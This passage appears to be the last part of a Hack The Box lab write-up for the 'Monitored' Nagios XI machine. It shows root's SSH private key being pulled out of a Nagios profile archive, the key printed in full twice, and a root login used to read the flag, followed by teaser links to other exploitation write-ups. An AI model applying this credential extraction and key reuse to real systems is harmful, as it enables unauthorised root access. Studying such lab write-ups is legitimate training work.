nagios@monitored:/usr/local/nagiosxi/var/components$ unzip -p profile.zip profile-1737331758/phpmailer.log
<zip -p profile.zip profile-1737331758/phpmailer.log
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
root id_rsa
sh
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----sh
ssh -i root_id_rsa root@10.10.11.248
The authenticity of host '10.10.11.248 (10.10.11.248)' can't be established.
ED25519 key fingerprint is SHA256:9OHJUUmtPpW4c0Wd2uLNekhWz54m/ybR2dZlg94Ein0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.248' (ED25519) to the list of known hosts.
Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@monitored:~# whoami
rootroot.txt
sh
root@monitored:~# cat root.txt
2ae7f166...Up next
EasyJan 2025
HTB — Precious
Pdfkit CVE-2022-25765 SSRF/command injection via URL parameter in PDF generation endpoint. Ruby bundler YAML deserialization for root.
Read writeup
EasyJan 2025
HTB — Help
HelpDeskZ GraphQL unauthenticated query exposes user creds. File upload bypass for PHP webshell. Kernel 4.4 exploit for root privilege escalation.
Read writeup
MediumJan 2025
HTB — Magic
Magic Portfolio with SQLi bypass on login. File upload bypass with double extension for PHP webshell. mysqldump credential extraction and SUID sysinfo for root.
Read writeup